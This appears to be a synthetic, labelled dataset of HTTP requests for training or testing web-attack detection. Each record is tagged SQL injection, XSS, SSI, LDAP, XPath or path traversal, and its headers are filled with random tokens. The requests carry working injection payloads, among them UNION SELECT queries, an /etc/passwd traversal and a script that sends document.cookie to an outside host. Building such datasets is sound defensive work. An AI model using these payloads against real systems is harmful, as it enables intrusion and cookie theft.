Via: FTP/0.1 www.brrsnuo.html
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 351 24.73.41.38:3 "Asogrdto" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 62972291005
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35824
Start - Id: 48316
class: XPathInjection
GET /wORinE/O1rRnqhwEsh8gr2/aOuakdxrJZTjkIotw0V/9-XbRBlogPh/b1DwK56@1wDElBHkMk/bKzrpx@Gr.hKLy/rQczQtbPmgY-ibtf9/oRgtmaqmter/d9wUfetn/31t/tXkrWb.Cp5b4@J/VezAdOtmpiGMnY1tE.msf?eMstyleyzO=8A8eyml8ssn6adrsre&BMOYwDc=13081&fed5t=echoh&Wb=0345&xerscebsbDH2t=102618&xset2xh=o&spuW5JGAiQ=rcpiorx&h87aiaanx=6857&br0btmea7o=F&6bwfeeistt35w=32 HTTP/1.1
Host: 218.115.199.13:35
Connection: tsdcrKc
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 190.236.243.192
Cookie: Al9dsIn7WCeac5=TexecohsteLay8en;7n1seqe=91648937;nhheb=e1nEcxjAi;MmZ6of7f=)e;cuuoh=htHi
Cookie2: $Version="3"
Date: Thu, 11 Nov 04 17:53:41 UTC
ETag: W/"8bryrAVeHZlsVcY0"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Sun, 04 Oct 09 19:49:47 GMT
If-Match: *
If-None-Match: *
If-Range: "AcMPFfFNC64nKHqcI9oi"
Max-Forwards: 2
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: Basic b3NpdjpIaWVrbnI5aQ==
Referer: /esema/rzenupp/irInb/n0esdza.asmx
TE: trailers,gzip;q=0.4,chunked;q=0.7
Trailer: If-Modified-Since
User-Agent: lvacrpe'] |  P   |  //user[ name/text()    =   'es
UA-Disp: 296,6544,16
UA-Color: color32
UA-Pixels: 433x249
Via: 0.5 www.onileto.jpg, pmwshi/7.2 21.94.135.100:329, 6.9 www.rdtwirs.html
Transfer-Encoding: uthgao
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 835 www.tlNlwgs.gif:920 "iep7CLmofu" "Sun, 29 Feb 04 15:41:20 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48316
Start - Id: 42174
class: SqlInjection
GET /zhtacces5fP6phpAp8Ql/hU@XgyGIid6K4Rh/iVGs92/ieaers/atdsemcdJietmxemhf/hrtege-Z/etwbealaNhecjoee/R5qtJQLtmpX/i0ci7abth/eitwstthmcenboian/KdrmE.MhsT_include8x.jpeg?orsguttaee=opt&e83uo0eeerEa=pitee%27%2F**%2FUNION%2F**%2FSELECT%2F**%2FAr9ysxi%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Ft7onnr%2F**%2Flike%2F**%2F%27%2525&vbscriptTJU=+umtGob1nlE2xs&ftsmt0tauildv0=5200&eN5Hs0=fweeboot.iniqnv3wimgbOa HTTP/1.1
Host: 153.97.66.157:100
Connection: keep-alive
Accept: text/html;q=0.8
Accept-Charset: x-mac-icelandic, x-mac-chinesesimp, macintosh, utf-8;q=0.0, us-ascii
Accept-Encoding: gzip;q=0.1, gzip, gzip, gzip;q=0.9, gzip;q=0.1
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 36.147.99.223
Cookie: ddtiaoo=6;sRs3gr5d=rrns;t4uoiy=YxbaTteE e)egit;Q3jnBypK=Enyd;cNAnadt=15anastoGmailc
Cookie2: $Version="4"
Date: Thu, 08 Sep 05 15:06:06 CET
ETag: "rmoKgaJRhzxXhz04d"
Expect: uonhe=heuanl
From: hmrl@wdteioa4s.uk
If-Modified-Since: Fri, 24 Apr 09 13:33:30 CET
If-Unmodified-Since: Wed, 29 Mar 06 24:23:25 GMT
If-Match: "boYIb4i8MsFnDmJd_V"
If-None-Match: *
If-Range: "MaNbJCEuM_ftW1Ee"
Max-Forwards: 5617
MIME-Version: 5.3
Pragma: eiio=ystj
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: NTLM QWVldHJ1bXNzSHdYMHRicGp0b3l1Z2FuaWlyaG5pY2hyVGFndg==
Range: 1010-
Referer: /eeo3t.php4
TE: gzip,gzip;q=0.2,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (compatible; Konqueror/3.8; Linux i586; Ooo4o; eqtaan)
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: gzip
Upgrade: nredd/1.9, kMnu/6.6, iarn/4.0
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42174
Start - Id: 40837
class: SSI
GET /iYWVYMHdX6w42_JV/ecbrdcoe9h/wieRbP6R9uMngZZPmyy/sA/tyltgircz6/arnes/eishnH7/iAp1iodts.tiff?imqs=z869&o6sorWelnriO=2909&rl5t0omgnpJalbs=417977205&s5oI=%3C%21--+%23odbc++++connect%3D%22zgxif%2CksgsA%2CamsyT%22+++++++++statement%3D%22select+++*+++from+++++jld%22--%3E&zh36ulont=872324554&Oa6Qzn0a=b9eacfsefa&tiznbI=TptarAaa9a&gnt=eqcuptUvfrEa&nsn7gqtrz=46488&00UNXcwnull=nobjecttd&nathlna=11&IPtmA=187&iue=tGex8 HTTP/1.1
Host: www.u6skntqn.net:80
Connection: keep-alive
Accept: application/postscript, image/*;q=0.2
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: min-fresh=33
Client-ip: 75.99.25.245
Cookie: 933ootIwmWieyi=cS-1DqJ;dti=4171181
Cookie2: $Version="353"
Date: Mon, 24 Aug 09 16:57:26 CET
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: 100-continue
From: heeo2q@daRia.de
If-Modified-Since: Mon, 21 Jan 08 14:08:28 GMT
If-Unmodified-Since: Fri, 13 Feb 09 14:30:37 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Feb 08 23:23:47 GMT
Max-Forwards: 299
MIME-Version: 9.0
Pragma: luTs=lmlfm
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Basic aXNyb3Q6aXRvQ2lh
Range: 4-703669
Referer: http://dTuoti.ch/ntirann/i9sntb/QtebtA/aeoaie.png
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: 9pie9teiie (t44hqW; plko.-; ecSVF5d; pnBRE1sMil; sL5yiO@3SJ)
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 266x239
Via: FTP/2.2 164.251.101.92, HTTP/3.4 246.153.35.173, FTP/0.5 www.edattOt.png
Transfer-Encoding: gzip
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 943 www.nneettw.tiff "el9tus" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 546087958111322
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40837
Start - Id: 47859
class: XSS
GET /iIp.css?hrlaaenigtcifeu=27&hatr2atira=wojedC%7Czfles1d8&risGssngsihr=6w+ee&shuoxa8rtAdere=n%5D3a&Xs8update.jrTphWW=window.openat&asialsh7=+i0viao2nyi&rnnie=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.nt.com%2Fcgi-bin%2Fontorais.cgi%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E&broe1dTsrset=m+ny-o-%3D4-2ddocumentt HTTP/1.1
Host: 55.129.103.79
Connection: r9nrot
Accept: video/*, video/mpeg;q=0.2, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ral-unUauh, iedmwen-scwa8, da-abbr;q=0.9
Cache-Control: uytldd=a7tcah
Client-ip: 237.181.40.228
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="7"
Date: Fri, 13 Nov 09 04:37:32 CET
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: 5uawbe5@Rlotbsnho.net
If-Modified-Since: Mon, 13 Oct 08 19:18:02 UTC
If-Unmodified-Since: Wed, 10 Aug 05 18:50:52 CET
If-Match: "s52Zv4L01-S3.8qO2C2"
If-None-Match: "zXFeF.rsiCT_wYWl2jd"
If-Range: Fri, 20 Jul 07 05:27:58 CET
Max-Forwards: 7574
MIME-Version: 9.4
Pragma: Eo4o='uiChtr'
Proxy-Authorization: Basic aWZueGpkbjp3bWVuaDc=
Authorization: Digest opaque="dafoil"
Range: 595606-7,222673-07
Referer: http://www.s7dc.org/xari/ataxgxst/lteb.asp
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: d8ie/4.1.4.1
UA-CPU: StrongARM
UA-Disp: 4309,162,32
UA-Pixels: 3411x5439
Via: 0.0 11.23.197.132, osa/1.0 www.sFraw.tiff
Transfer-Encoding: compress
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 420 163.148.232.91 "lraIhepmpe4o3l" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47859
Start - Id: 38357
class: LdapInjection
GET /ArneohermritujttK/5rieens6nKMbegdaDt/welto4ald6e7Si/n72en/Q9g/as5UFAlO6.gif?VgWzV=bCG4IM&bzupdateSyFgQ=roa4oz&PycZiframesock_streamMGY=eaubotblcfx&eremlsnb=rdd&or9luemLoa2assi=w8ohe&mrkrc3oseSVhae=utAkUWNjWls&doqe8beahas=keru&L6Lixfp.7=2820&p0Hkdseek=4Y5i7rh&GFd4phpbodygtnZAY=2&tciwn0rosk1=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&6ii=9%3E&52binCd=es+4v HTTP/1.1
Host: 209.209.140.126
Connection: mron
Accept: */*;q=0.4
Accept-Charset: x-mac-ce, euc-cn, x-mac-greek, windows-1255
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="5"
Date: Sat, 29 Mar 08 11:08:33 GMT
ETag: W/"5LoC-V6hl1TUEpQHFV"
Expect: 100-continue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Tue, 18 Aug 09 02:15:53 UTC
If-Unmodified-Since: Mon, 26 Apr 04 09:33:28 UTC
If-Match: "yzc6eQdiiKE7Bnon39"
If-None-Match: *
If-Range: Sun, 22 Nov 09 13:30:11 CET
Max-Forwards: 2
MIME-Version: 0.4
Pragma: iE5se='re8'
Proxy-Authorization: Digest response="24bdDc9027Eaafbdb25b48aD0Bc2B85e"
Authorization: Basic Z25Bamk6aW8xcm5z
Range: 0-190754,-136
Referer: http://hSfeo.org/4hPuenap.zip
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.8 (X11; U; Unix 8.9; br-ta; rv:3.5.0) Gecko/66431140
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 231x314
Via: 7.2 115.92.196.7:1, 6.5 www.earnczr4.html
Transfer-Encoding: compress
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38357
Start - Id: 45167
class: PathTransversal
GET /./? HTTP/1.1
Host: www.Encno.org
Connection: close
Accept: */*;q=0.1
Accept-Charset: cp-936;q=0.8, windows-1258;q=0.8, x-mac-greek;q=0.1
Accept-Encoding: 
Accept-Language: tmll-d, iaw-ar;q=0.9, yrse-tiuta;q=0.8
Cache-Control: no-cache
Client-ip: 49.63.221.221
Cookie: bsmSo=oansait;V5CTXjwmKNR=wLYfE_d
Cookie2: $Version="70"
Date: Wed, 25 Aug 04 20:06:18 GMT
ETag: W/"A2GfweKXm_TLmbvnWY"
Expect: hness
From: eawnt@ds5lo.de
If-Modified-Since: Sun, 29 Jan 06 23:54:29 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 372
MIME-Version: 3.0
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: Digest algorithm=MD5-sess
Range: 551-3881,-846
Referer: /PaEu.php4
TE: deflate;q=0.3,chunked
Trailer: Date
User-Agent: Mozilla/1.9 (compatible; Konqueror/0.9; Win 9x; mc9Nwet; ttsmp; looEAjtci)
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: qnt/3.8 www.cuS9lhet.html, 1.2 www.b6etb1ea.css, 7.8 117.85.196.77
Transfer-Encoding: tlEn5; ceeeeer=geezwhe
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45167
Start - Id: 38916
class: LdapInjection
GET /emgteq/x9asRE9/mNxk8t3dP7yEczWitI8/upiNmcti2fohejE/twNtieqr8iaetid9/hnzngnSstkRxBdi3ls/ys2ad0chm/tano.swf?onnaET=tie&Deows=%29%28+%7C+++%28++++cn%3D*o+++%27brien*%29%28mail++%3D*o++++%27brien*++%29++&7p7=obodyefdjaag&lncto2=5236&3TOma=et8eiteyoeaotekc&ekpaeE9=wtTHvny+ftpaiedivla&TaeET6ooel=6Naino1z&ohaaahrgN=cREQS&a6YiJ=0troTh&yoetnar=ecDutBss%40x0%24Os%27roSe5 HTTP/1.0
Host: www.N1yftr9.st
Connection: keep-alive
Accept: image/*;q=0.4, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bife-r1EinKe, t-lnd, nsnae-taaoOlds, m-gpaEoa
Cache-Control: min-fresh=90431
Client-ip: 200.72.166.1
Cookie: 2Brts8odernl=a@k;w5LeAsock_streamedb=90
Cookie2: $Version="45"
Date: Thu, 18 Mar 10 12:25:12 UTC
ETag: W/"9LE17vqhoeAGtK2Z96N"
Expect: 100-continue
From: g0ftcpby@2esla.fr
If-Modified-Since: Mon, 02 Jun 08 13:29:09 GMT
If-Unmodified-Since: Wed, 18 Jan 06 21:07:27 GMT
If-Match: "tPJS-._P.Hq9OBZvSK"
If-None-Match: "mxpBaSZlNMBvj9Xhe8h@"
If-Range: "rMCEEPNZJUo41oqT0GgM"
Max-Forwards: 25
MIME-Version: 7.2
Pragma: rqnet=n2rk
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: NTLM c2V6dGllZWNtN2VtZm82aXdibGZoaWNuZWd0bjI5b2llYWU=
Range: 979-,2-1
Referer: http://tkash.net/ymse2aHe/uiutQi/t64bd/egau0t0/osbt.bin
TE: trailers
Trailer: Pragma
User-Agent: eAadg/4.7.5.6.7
UA-Disp: 518,9521,8
UA-OS: Win95
UA-Pixels: 1628x672
Via: 6.7 113.233.112.39:36875, FTP/1.4 www.fcercqe.css
Transfer-Encoding: beHeo; aBeAep=2egbTh
Upgrade: toues/6.2, Lrne/8.5, oec5E/9.4, eyhe/5.1, eneaoo/3.9
Warning: 695 www.5pter.js "oYstrefhsreaowhenept" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38916
Start - Id: 49106
class: XPathInjection
GET /81WSJeumyy/iY@07lcadFqzyj.jpeg?0bJWHallautoexec=e1&osxsX=sSnr&Onxfdgrk=5++++or++1%3C+++senap%2Fnea%2Fotfa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D+++or+++++90%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&n5odlnTt1fklbi=jasYe&12r=48325170&nh8xReie1rn=talooiteaoeSn&ryedeanaaan=mRu8x&3yhf3SyZd=wt5ixtermyrt%28&oudeaa=86&XD8htaccesEyeg=%3BY%7Cnhlit3&ns2eyeiyrraHt=c HTTP/1.1
Host: www.onert.gov
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-7;q=0.6
Accept-Encoding: *
Accept-Language: xrdnt4tu-ioatjnqo;q=0.2, itorh-okorm
Cache-Control: ephrtr='dott'
Client-ip: 10.198.108.23
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Tue, 06 Dec 05 10:18:28 CET
ETag: "i9p280DZTSCOq9@T"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Mon, 01 Feb 10 12:40:14 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: *
If-Range: Mon, 30 Aug 04 16:11:58 UTC
Max-Forwards: 18
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: Basic YXRpZm46YW1uRWhtbg==
Range: 80-
Referer: http://skmroen.com/Rqwiea/xabow/lftmHe.exe
TE: trailers
Trailer: Referer
User-Agent: re7qqdesar/7.6.8.8
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9298x371
Via: 8.6 151.112.194.68
Transfer-Encoding: identity
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49106
Start - Id: 41240
class: SqlInjection
GET /nnYstrat/mppo0h/orehqiqs/98wR1n/ve/dqMPja5WMx8z9x/tcs9aQ/uEeTh/eisecOtsoe9lr6mq5se/dAl.metaaEdzpS..htm?eoTndSMos=srwehoa%3Doeqfkl&iw=v&maa8oacrrtapuh8=jsqtalliframe&rnv4=5593&e8otsaM8m=rRsp&UtitnrmKgheiUa=p++mniiaa&nedv8be=%3Bie&eh1h=1&Oto9=118485168&pol3AstchxW=Tbxs%7Epl6eb%3Bor&ltc=tnohsdinedyCaaahrc&ihcsogaimdehar=niNbtaeuebkhdt&gLXSE4=aC5QD-xFZy&BesMsHp=aetraaodntsioiera&mRKiBAl-=40 HTTP/1.0
Host: 230.141.156.146
Connection: close
Accept: text/*;q=0.0, image/gif;q=0.1, text/*
Accept-Charset: x-mac-ce;q=0.9, x-mac-greek;q=0.7, windows-1255, x-mac-icelandic;q=0.4, x-mac-icelandic
Accept-Encoding: 
Accept-Language: wpe6T-b5b;q=0.2, o9i0triz-fa9eat
Cache-Control: no-transform
Client-ip: 137.5.183.29
Cookie2: $Version="2"
Date: Sat, 01 Aug 09 03:24:53 UTC
ETag: W/"P9Niq6_s0DQ2KH.n-Hv"
Expect: eu0iefee
If-Unmodified-Since: Fri, 17 Jun 05 15:46:05 GMT
If-Match: "qCjVLWYZH5IDLYv"
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: Tue, 26 Feb 08 01:40:53 CET
Max-Forwards: 09
MIME-Version: 4.6
Authorization: NTLM YXJ3ZWRoMGVDd0FoT251MG5ydGxoYmV0bGoxZUVlUmRuN29laQ==
Referer: /ecbccz5.msf
User-Agent: '     group by users.id   having    36880=36880
UA-Disp: 9585,9750,32
UA-OS: Linux
Via: 9.8 215.202.233.161
Transfer-Encoding: eeant
Upgrade: nI4c/2.6
X-Forwarded-For: 248.13.251.126
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41240
Start - Id: 49875
class: XPathInjection
GET /i1jtkNKzMQgEvPa/sRybasiesssP/s9nfwhhra/tel5ne.jpeg?swEN=868527&rhc5r=ualc&obr2=8&tosnogsoie=0710750046&yi=lmelM&tehOb8=chhceN%3ClscriptaCslconnectj%40etow&3asesiM=eoltgze%27%5D+++%7C+P+%7C++%2F%2Fuser%5B+++++name%2Ftext%28+%29++%3D++%27Ir HTTP/1.1
Host: 65.23.121.6:1811
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: jooi-pt, sttrioe-zr
Cache-Control: no-store
Client-ip: 208.72.48.53
Cookie: oorx=ioorisir
Cookie2: $Version="5"
Date: Thu, 13 Nov 08 02:29:36 UTC
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 30 Jul 09 11:24:27 UTC
If-Match: "-jPulvoVoH1-@qDy2C"
If-None-Match: *
If-Range: Tue, 19 Sep 06 14:38:20 CET
Max-Forwards: 0006
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: NTLM cGF1aGlvbmFhYVd0ZXRXR1U2dGhyZmVuaXdzbWplbmRyZ2x2bkE2ZQ==
Range: -307462,64-76604
Referer: http://www.Baba.it/a9dnd/de22/rerowls/orvto/i9sr.php
TE: chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.6 (compatible; Konqueror/4.6; Win 9x; idOn; teai; sreo)
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: HTTP/6.9 126.124.59.169, 8.7 237.183.123.154:001
Transfer-Encoding: wm2h8k
Upgrade: ioh/5.5, bzl/3.8, 7md9/8.9, Pus3ou/3.2, nIiiic/7.8
Warning: 805 www.rthT.jpeg "seTho" "Sat, 29 Apr 06 13:15:49 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 53579820106076
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49875
Start - Id: 46517
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.0
Host: www.lniko5.de
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: snqten6=t
Client-ip: 217.88.94.178
Cookie: rtn9wiyuark=ehl~?weweallaeallalk&L;b;roOr=gimcnzso3rax;a1tc=nf9-Jt.e3Iy;N6xNeursEr=aVueu;hge9issNrn=inhe9ocrg
Cookie2: $Version="1"
Date: Tue, 09 Jun 09 11:07:53 UTC
ETag: W/"fn_EJ5mCKo.wleLjgs"
Expect: 8enk=l68tr
From: eHTlcetd@ogsi0oerkl.biz
If-Modified-Since: Sun, 13 Nov 05 12:15:35 GMT
If-Unmodified-Since: Fri, 29 Feb 08 01:32:03 CET
If-Match: "sxa9XaWF5oOcwQJ3FF@h"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: Wed, 16 Jul 08 23:46:15 UTC
Max-Forwards: 7600
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: -97604
Referer: http://Tydwca.st/fpblch/xdalcd9r/deDadn.asmx
TE: chunked;q=0.5,gzip
Trailer: Pragma
User-Agent: Mozilla/3.3 (compatible; higijtdT8i; Linux i586; stave0agT; yerYhW)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/5.6 186.35.189.146, 4eg3/3.9 77.123.53.205:9864
Transfer-Encoding: deflate
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46517
Start - Id: 41705
class: SqlInjection
GET /oO23akd1fsca2/uEA9ugrqaN/lR3085@XAEfrBP/hagaqijyhO.jpg?m3ant=iaRdv&aErl0om9U=t+xmlnahri+aAgtn&IatntIy2nin=686&ien=055023&clciNiaqrte=ii0dor0+efieetxi&eidgsena=1&mLpaltuto=n6y7%240Jaxhe&pwRnoykci=nhstb%2Fma%3B+%3F&yjwcwaanose=idxPK70kbd&SFrVtsGe=073&ohte=cwtna&1iese4=%27+++UNION++++++++ALL+++++++++SELECT++++kEero6aaa+FROM+++++mdeb+++WHERE++%27%27+++%3D+%27&4fn=%5Dctnul7r HTTP/1.1
Host: 192.186.218.193
Connection: Sszl7w
Accept: image/*;q=0.9, video/*, audio/x-wav
Accept-Charset: iso-8859-5
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=07
Client-ip: 173.191.187.99
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="0"
Date: Fri, 08 Apr 05 23:41:46 GMT
ETag: "AG5CAg.oj.vm0Whv.Z2"
Expect: 100-continue
From: nrnG@tfeie8.biz
If-Modified-Since: Wed, 08 Dec 04 11:10:56 GMT
If-Unmodified-Since: Sun, 30 Nov 08 21:03:55 UTC
If-Match: "Fu6sD-vyicb6u9b2"
If-None-Match: *
If-Range: "-KuWBsW5qsrNho.1"
Max-Forwards: 36
MIME-Version: 5.8
Pragma: rhl0rs='t'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bnBzMm90RTlhaTJ0dmhvaHJpZTE3OHJhaW5lbmVkYTBTYW90ZXdhbw==
Range: 864538-4,42725-309719
Referer: /AYFg/otni7/nneo/aiit.nsf
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/7.2 (X11; U; SunOS sun4u 1.3; sw-sA; rv:9.7.7) Gecko/03515233
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
Via: HTTP/0.2 www.orcbefoE.html, 6.9 81.211.65.19
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 196 174.84.69.81 "ewttXoTtla" 
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41705
Start - Id: 46398
class: PathTransversal
GET /dih5anx/l03wCSodw/rE1ant/5evalMx4Ux/HTaGPdOIF.shtml?d1ho=n6KaxcXi&srte=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&V2s3qrO7r3j3=nso&6cYTkTNTaa=%3Decmdees%2Fioh&s8rj3rlylnrE=oOservices%29swindow.opensoztnbftwinnt HTTP/1.0
Host: www.atie4cs4si.ch
Connection: tzxaI
Accept: audio/*;q=0.9
Accept-Charset: euc-jp
Accept-Encoding: 
Accept-Language: Dstm-Eso;q=0.8, nn-H, li-uvek
Cache-Control: no-cache
Client-ip: 232.215.173.164
Cookie: ie0trhrgh=ula2nauuso;m8oahonctZuc=7136524;tboneoS=nUR;ri=pfp;3ynohw5xeai6s=gycaxterm
Cookie2: $Version="4"
Date: Thu, 20 Mar 08 07:01:12 GMT
ETag: W/"NmzUcd4Oc4.oiXZu9LS"
Expect: 100-continue
From: 5a6ct@oese.gov
If-Modified-Since: Mon, 22 Oct 07 12:50:18 CET
If-Unmodified-Since: Fri, 17 Nov 06 24:21:57 GMT
If-Match: *
If-None-Match: "RRP0poUXVovgCzsI"
If-Range: "Qit8B40Y9twy_xGdcR"
Max-Forwards: 249
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest response="9eABA3a83fa522094D696FccACC995CA"
Range: 0-,-1441,-234089
Referer: /ehersn/rniaamtU.pl
TE: chunked,gzip
Trailer: TE
